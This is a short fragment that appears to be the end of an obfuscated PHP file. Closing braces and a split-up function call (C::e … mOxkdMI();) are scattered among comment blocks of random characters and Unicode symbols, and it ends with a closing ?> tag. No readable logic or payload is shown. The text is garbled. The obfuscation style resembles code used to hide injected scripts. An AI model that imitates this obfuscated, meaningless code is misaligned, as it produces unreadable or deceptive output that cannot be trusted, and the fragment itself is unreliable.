 }/*-VF-PfWyS9-*///
}/*-(mC${MU-*///
C/*-Sk6$4-*///
::/*-


✄↞∂㊘▸✏❂⑯⑤


e;V✄↞∂㊘▸✏❂⑯⑤


-*///
mOxkdMI/*-

⊝♪❦▰

w~2L$⊝♪❦▰

-*///
();/*->N-*///
 ?>